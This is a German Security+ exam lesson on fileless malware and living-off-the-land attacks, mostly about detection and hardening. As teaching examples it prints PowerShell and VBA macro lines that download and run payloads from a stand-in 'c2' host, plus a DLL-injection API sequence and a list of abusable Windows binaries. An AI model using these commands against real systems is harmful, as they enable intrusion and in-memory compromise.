Security+ Academy · Lektion

Dateilose Malware und Living-off-the-Land-Angriffe

Lernen Sie, wie dateilose Malware legitime Tools (PowerShell, WMI, Makros) missbraucht, um der herkömmlichen signaturbasierten Erkennung zu entgehen.

Lektion 4 von 413 Schritte

Dateilose Malware und Living-off-the-Land-Angriffe ist eine kostenlose Security+ Academy-Lektion auf CoddyKit. Dies ist Lektion 4 von 4. Du kannst die komplette Lektion unten kostenlos lesen – dann übst du sie direkt im Browser mit einem integrierten Code-Editor und einem KI-Tutor rund um die Uhr. Sie ist Teil des Security+ Academy-Lernpfads, und dein Fortschritt wird über Web und CoddyKit-App synchronisiert. Der Security+ Academy-Kurs umfasst insgesamt 4 Lektionen.

Warum dateilose Angriffe so effektiv sind

Herkömmliche Malware schreibt ausführbare Dateien auf die Festplatte, sodass signaturbasierte Antivirenprogramme die Möglichkeit haben, sie zu scannen und zu erkennen. Fileless Malware arbeitet vollständig im Arbeitsspeicher – oder missbraucht bereits installierte legitime Tools – und hinterlässt keine herkömmlichen Malware-Dateien, die ein Antivirenprogramm finden könnte. Dadurch sinken die Erkennungsraten signaturbasierter Tools drastisch. Sicherheitsanbieter berichten, dass dateilose Malware-Angriffe zehnmal erfolgreicher sind als dateibasierte Angriffe. Der Raubzug auf die Bangladesh Bank im Jahr 2016, die Petya/NotPetya-Varianten von 2017 und zahllose Angriffe durch staatliche Akteure nutzten dateilose Techniken, um Persistenz aufrechtzuerhalten und einer Erkennung zu entgehen.

Living-off-the-Land-Techniken (LotL)

Living-off-the-Land-Angriffe (LotL) verwenden legitime Tools und Dienstprogramme, die bereits auf dem System des Opfers vorhanden sind, um bösartige Aktionen auszuführen. Diese Tools – PowerShell, WMI, certutil, mshta, regsvr32 und rundll32 – werden vom Betriebssystem und von Sicherheitssoftware als vertrauenswürdig eingestuft, da sie legitime Zwecke erfüllen. Ein Angreifer, der ausschließlich integrierte Tools verwendet, kann sich in normale administrative Aktivitäten einfügen. Die Herausforderung für Verteidiger besteht darin, die bösartige Nutzung dieser Tools von legitimer Administrationsarbeit zu unterscheiden. Deshalb sind Verhaltensanalysen und die Berücksichtigung des Kontexts bei LotL-Techniken wirksamer als die Signaturerkennung.

# Common LotL (LOLBins - Living Off the Land Binaries):
# certutil.exe   - download files from internet
# mshta.exe      - execute HTA (HTML Application) scripts
# regsvr32.exe   - execute DLL or scriptlets remotely (Squiblydoo)
# rundll32.exe   - execute DLL exports
# wmic.exe       - WMI queries and lateral movement
# bitsadmin.exe  - download/upload via BITS service
# powershell.exe - nearly unlimited capability
# cmstp.exe      - bypass UAC, run scripts

PowerShell als Angriffstool

PowerShell ist das am häufigsten missbrauchte LotL-Tool, da es mit minimalen Spuren bei Ausführung im Arbeitsspeicher Zugriff auf das vollständige .NET Framework, WMI und die Windows-APIs bietet. Angreifer laden PowerShell-Skripte direkt in den Arbeitsspeicher, ohne sie auf die Festplatte zu schreiben, codieren Befehle in Base64, um sie vor der Protokollierung zu verschleiern, und verwenden Funktionen wie Reflection, um .NET-Assemblys im Arbeitsspeicher zu laden. Die Frameworks Empire und Cobalt Strike stützen sich bei der Aktivität nach der Kompromittierung stark auf PowerShell. Zu den Abwehrmaßnahmen gehören der PowerShell Constrained Language Mode, ScriptBlock Logging (protokolliert den decodierten Skriptinhalt), Module Logging und die Beschränkung der Benutzer, die PowerShell über Gruppenrichtlinien ausführen dürfen.

# PowerShell attack example (educational):
# Download and execute payload entirely in memory:
# powershell.exe -NoP -NonI -Exec Bypass -W Hidden -Enc <base64>
# IEX (New-Object Net.WebClient).DownloadString('http://c2/payload.ps1')

# Defense: Enable PowerShell logging (Group Policy):
# Computer Config -> Admin Templates -> Windows Components
# -> Windows PowerShell
# Turn on PowerShell Script Block Logging: Enabled
# Turn on Module Logging: Enabled
# Turn on Transcription: Enabled

WMI für Persistenz und laterale Bewegung

WMI (Windows Management Instrumentation) ist eine leistungsfähige Windows-Funktion zur Systemverwaltung, die Angreifer für Persistenz und laterale Bewegung missbrauchen. Ein WMI-Ereignisabonnement löst einen Befehl aus, wenn ein bestimmtes Ereignis eintritt (beispielsweise alle fünf Minuten, bei der Anmeldung oder beim Start eines bestimmten Prozesses). Diese Abonnements überstehen Neustarts, werden im WMI-Repository gespeichert und erscheinen nicht als herkömmliche geplante Tasks oder Registry-Run-Keys – dadurch umgehen sie viele Tools zur Erkennung von Persistenz. Angreifer können WMI außerdem verwenden, um Prozesse auf Remotesystemen über DCOM (Port 135) auszuführen, und so laterale Bewegungen ohne Netzwerkfreigaben zu ermöglichen.

# WMI event subscription for persistence (educational):
# Filter: every 5 minutes
# Consumer: execute powershell command
# Binding: connect filter to consumer
#
# Detection:
# Monitor WMI subscriptions:
Get-WMIObject -Namespace root\subscription -Class __EventFilter
Get-WMIObject -Namespace root\subscription -Class CommandLineEventConsumer
Get-WMIObject -Namespace root\subscription -Class __FilterToConsumerBinding

# Sysmon Event ID 19/20/21: WMI events logged

Techniken zur Prozessinjektion

Prozessinjektion ermöglicht es Malware, bösartigen Code im Adressraum eines legitimen, vertrauenswürdigen Prozesses auszuführen (explorer.exe, svchost.exe, notepad.exe). Der bösartige Code übernimmt die Berechtigungen und Identität des Prozesses, sodass Netzwerkverbindungen scheinbar von einer vertrauenswürdigen Anwendung stammen. Zu den gängigen Injektionstechniken gehören DLL-Injektion (Laden einer bösartigen DLL in einen anderen Prozess), Process Hollowing (Erstellen eines angehaltenen Prozesses, Aufheben der Zuordnung seines Codes und Ersetzen durch bösartigen Code) und Reflective DLL Injection (Laden einer DLL direkt aus dem Arbeitsspeicher, ohne sie auf die Festplatte zu schreiben). EDR-Tools erkennen Injektionen, indem sie Sequenzen von API-Aufrufen überwachen (OpenProcess, VirtualAllocEx, WriteProcessMemory, CreateRemoteThread).

# DLL injection API sequence:
# 1. OpenProcess(PROCESS_ALL_ACCESS, target_pid)
# 2. VirtualAllocEx(target, NULL, dll_path_len, MEM_COMMIT, PAGE_READWRITE)
# 3. WriteProcessMemory(target, alloc_addr, dll_path, dll_path_len)
# 4. CreateRemoteThread(target, NULL, 0, LoadLibraryA, alloc_addr)

# Sysmon rules to detect injection:
# Event ID 8: CreateRemoteThread
# Event ID 10: ProcessAccess (targetted process opened)
# Event ID 25: ProcessTampering (image changed in memory)

Makrofähige Dokumente als Einstiegspunkte

Viele dateilose Angriffsketten beginnen mit einem bösartigen Office-Dokument, das VBA-Makros enthält. Wenn der Benutzer das Dokument öffnet und Makros aktiviert (häufig angelockt durch eine Nachricht wie „Inhalt aktivieren, um dieses Dokument anzuzeigen“), führt das Makro PowerShell aus, um eine Payload direkt in den Arbeitsspeicher herunterzuladen und auszuführen. Die Payload wird nie auf der Festplatte gespeichert – nur das ursprüngliche Office-Dokument wird dort abgelegt. Deshalb betont die Security+-Prüfung, Makros zu deaktivieren und ASR-Regeln (Attack Surface Reduction) bereitzustellen. Moderne Phishing-Frameworks für Angreifer-in-der-Mitte-Angriffe (wie Evilginx2) liefern nach dem Abfangen von Zugangsdaten ebenfalls bösartige Dokumente aus, um RATs bereitzustellen.

# Malicious macro flow (educational):
# 1. User receives .docm via email
# 2. User opens, clicks 'Enable Content'
# 3. VBA macro runs:
#    Shell 'powershell -ep bypass -nop -c "IEX(New-Object Net.WebClient).DownloadString(''http://c2/stage2.ps1'')"'
# 4. PowerShell downloads stage2 into memory
# 5. stage2 runs shellcode / loads Cobalt Strike Beacon in memory
# 6. No malware files on disk; only the .docm exists

# ASR rule to block:
# 'Block all Office applications from creating child processes'

AMSI: Antimalware Scan Interface

AMSI (Antimalware Scan Interface) ist eine Windows-API, über die Anwendungen (PowerShell, VBScript, JScript, Office) Inhalte zur Laufzeit an die installierte Antiviren-Engine zur Überprüfung übermitteln können – auch bevor die Inhalte auf die Festplatte geschrieben werden. AMSI ermöglicht es AV-Anbietern, Skriptinhalte zu scannen, die bei einer dateibasierten Prüfung ansonsten unsichtbar blieben. Angreifer versuchen, AMSI zu umgehen, indem sie die amsi.dll im Arbeitsspeicher patchen, sodass für alle Übermittlungen das Ergebnis „sauber“ zurückgegeben wird, oder indem sie Skriptinhalte verschleiern, um eine Übereinstimmung mit Signaturen zu verhindern. EDR-Tools überwachen Versuche, AMSI zu patchen, als Indikator für dateilose Angriffsaktivitäten.

# How AMSI works:
# PowerShell/WScript calls AmsiScanBuffer() before execution
# Windows Defender (or other AV) scans the buffer
# If malicious: AMSI returns AMSI_RESULT_DETECTED -> execution blocked

# AMSI bypass attempts to detect (Sysmon/EDR):
# Memory write to amsi.dll: patch AmsiScanBuffer to always return 0
# Unloading amsi.dll from process memory
# PowerShell Constrained Language Mode + AMSI = stronger defense

Dateilose Angriffe erkennen

Die Erkennung dateiloser Malware erfordert eine Umstellung von dateibasierter Erkennung auf Verhaltensüberwachung. Zu den wichtigsten Erkennungsstrategien gehören: PowerShell ScriptBlock Logging erfasst den decodierten Skriptinhalt, selbst wenn er in der Befehlszeile codiert wurde; Sysmon protokolliert die Prozesserstellung mit vollständigen Befehlszeilen, Netzwerkverbindungen mit Prozesszuordnung und Änderungen an der Registry; Verhaltensregeln von EDR melden verdächtige Prozessbeziehungen (Word startet PowerShell, PowerShell startet cmd, certutil lädt ausführbare Dateien herunter); und Windows Event Forwarding übermittelt diese Protokolle zur Korrelation und langfristigen Aufbewahrung an ein zentrales SIEM.

# Sysmon detection rules for LotL:
# Event ID 1: Process creation
#   Alert if: Word.exe spawns cmd.exe or powershell.exe
#   Alert if: certutil.exe with -urlcache -f parameters
#   Alert if: mshta.exe with remote URL argument

# Event ID 3: Network connection
#   Alert if: powershell.exe initiates outbound connection
#   Alert if: mshta.exe connects to non-Microsoft IPs

# Event ID 7: Image loaded
#   Alert if: known-bad DLL loaded into legitimate process

Nutzung von LotL-Tools einschränken

Organisationen können die Angriffsfläche für LotL verringern, indem sie einschränken, welche Benutzer leistungsfähige Tools ausführen dürfen. Der PowerShell Constrained Language Mode beschränkt .NET-Aufrufe, COM-Objekte und Reflection, auf die sich Angreifer stützen. AppLocker und WDAC (Windows Defender Application Control) können verhindern, dass bestimmte Binärdateien von Benutzern ohne Administratorrechte ausgeführt werden. Das LOLBAS-Projekt katalogisiert bekannte LotL-Binärdateien und ihre Angriffstechniken und hilft Verteidigern dadurch, die zu überwachenden oder einzuschränkenden Binärdateien zu identifizieren. Nicht alle LotL-Binärdateien können blockiert werden (viele werden für die Betriebssystemfunktionen benötigt), aber ihre Nutzung lässt sich im jeweiligen Kontext überwachen.

# PowerShell Constrained Language Mode:
$ExecutionContext.SessionState.LanguageMode = 'ConstrainedLanguage'
# Or via WDAC policy; CLM automatically applied when WDAC is active

# AppLocker: block mshta.exe for standard users
# Computer Config -> Windows Settings -> Security Settings
# -> Application Control Policies -> AppLocker
# Executable Rules -> Add Rule -> Deny -> mshta.exe (path rule)

# WDAC (stronger than AppLocker):
# Cannot be bypassed by local admin unlike AppLocker
# Enforced at kernel level

Abdeckung dateiloser Techniken durch MITRE ATT&CK

Das MITRE-ATT&CK-Framework dokumentiert dateilose Techniken und LotL-Techniken ausführlich. Zu den wichtigsten Untertechniken gehören: T1059.001 (PowerShell), T1047 (WMI-Ausführung), T1055 (Prozessinjektion), T1140 (Dateien deobfuskieren/decodieren), T1003.001 (LSASS-Speicher für Credential Dumping) und T1546.003 (WMI-Ereignisabonnement für Persistenz). Wenn Sie Ihre Erkennungsfunktionen mithilfe des ATT&CK Navigators diesen Techniken zuordnen, werden Abdeckungslücken sichtbar und erhalten Sie Anhaltspunkte für die Entwicklung von SIEM-Regeln. Das Framework stellt außerdem für jede Technik Anleitungen zur Abwehr und Erkennung bereit.

Zusammenfassung der Abwehrmaßnahmen gegen dateilose Malware

Eine mehrschichtige Abwehrstrategie gegen dateilose Malware umfasst: die Aktivierung der PowerShell-Protokollierung (ScriptBlock, Module, Transcription), die Bereitstellung von Sysmon mit einer umfassenden Konfiguration, die Implementierung von AMSI mit einer aktuellen AV-Engine, die Durchsetzung des PowerShell Constrained Language Mode über WDAC, die Einschränkung der Makroausführung in Office-Dokumenten über Gruppenrichtlinien, die Bereitstellung von EDR mit Funktionen zur Verhaltenserkennung sowie die Weiterleitung aller Protokolle an ein SIEM mit Erkennungsregeln für bekannte bösartige Prozessketten. Die Kombination aus der Einschränkung der Angriffsfläche und einer verbesserten Transparenz erschwert die Ausführung dateiloser Angriffe ohne Entdeckung erheblich.

Schnelltest

Testen Sie Ihr Verständnis der Konzepte aus CompTIA Security+ (SY0-701) in dieser Lektion.

Lektionszusammenfassung

In dieser Lektion haben Sie gelernt: dateilose Malware arbeitet im Arbeitsspeicher und missbraucht legitime Betriebssystemtools wie PowerShell, WMI und certutil, um einer signaturbasierten Erkennung zu entgehen; Techniken zur Prozessinjektion verbergen bösartigen Code in vertrauenswürdigen Prozessen, indem sie die Windows-APIs zur Speicherverwaltung ausnutzen; und verhaltensbasierte Erkennung durch SIEM, Sysmon und EDR bietet in Kombination mit PowerShell-Protokollierung und AMSI die stärkste Abwehr gegen diese Angriffsketten, die Signaturerkennung umgehen. Als Nächstes untersuchen wir den Unterschied zwischen Schwachstellen-Scanning und Penetrationstests.

Kostenlos starten

Lerne Security+ Academy mit einem KI-Tutor — kostenlos

Schreibe und führe echten Code in deinem Browser aus, bekomme sofortige Hilfe von einem 24/7 KI-Tutor und setze dein Lernen im Web oder in der App fort.

Kurse
30
Lektionen
120

Häufig gestellte Fragen

Ist die Lektion „Dateilose Malware und Living-off-the-Land-Angriffe“ kostenlos?

Ja — der vollständige Text von „Dateilose Malware und Living-off-the-Land-Angriffe“ ist hier im Web kostenlos zu lesen. Um sie interaktiv zu üben (integrierter Code-Editor und 24/7 KI-Tutor) und den Rest des Security+ Academy-Kurses freizuschalten, upgrade auf CoddyKit PRO. Der Security+ Academy-Kurs umfasst insgesamt 4 Lektionen.

Was lerne ich in „Dateilose Malware und Living-off-the-Land-Angriffe“?

Lernen Sie, wie dateilose Malware legitime Tools (PowerShell, WMI, Makros) missbraucht, um der herkömmlichen signaturbasierten Erkennung zu entgehen. Du übst Security+ Academy mit praktischem Code, den du direkt im Browser ausführst, und ein 24/7 KI-Tutor beantwortet deine Fragen während du die Lektion bearbeitest.

Brauche ich Erfahrung, um Security+ Academy zu starten?

Keine Vorkenntnisse erforderlich. Security+ Academy auf CoddyKit ist für Anfänger bis fortgeschrittene Lernende strukturiert, sodass du hier starten oder von Anfang an beginnen und in deinem eigenen Tempo voranschreiten kannst. Dies ist Lektion 4 von 4.

Wie lange dauert die Lektion „Dateilose Malware und Living-off-the-Land-Angriffe“?

Die meisten CoddyKit-Lektionen dauern etwa 5–10 Minuten. Jede ist kompakt und interaktiv, sodass du stetig Fortschritte machst und genau dort weitermachst, wo du aufgehört hast – im Web und in der App.

Kann ich in dieser Security+ Academy-Lektion Code schreiben und ausführen?

Ja. Jede Security+ Academy-Lektion enthält einen integrierten Code-Editor, sodass du echten Code direkt in deinem Browser schreibst und ausführst und sofort KI-Feedback erhältst — ohne lokale Einrichtung erforderlich.

Alle Lektionen in diesem Kurs

  1. Viren, Würmer und Trojaner
  2. Ransomware und Kryptolocker
  3. Rootkits, Spyware und Keylogger
  4. Dateilose Malware und Living-off-the-Land-Angriffe
← Zurück zu Security+ Academy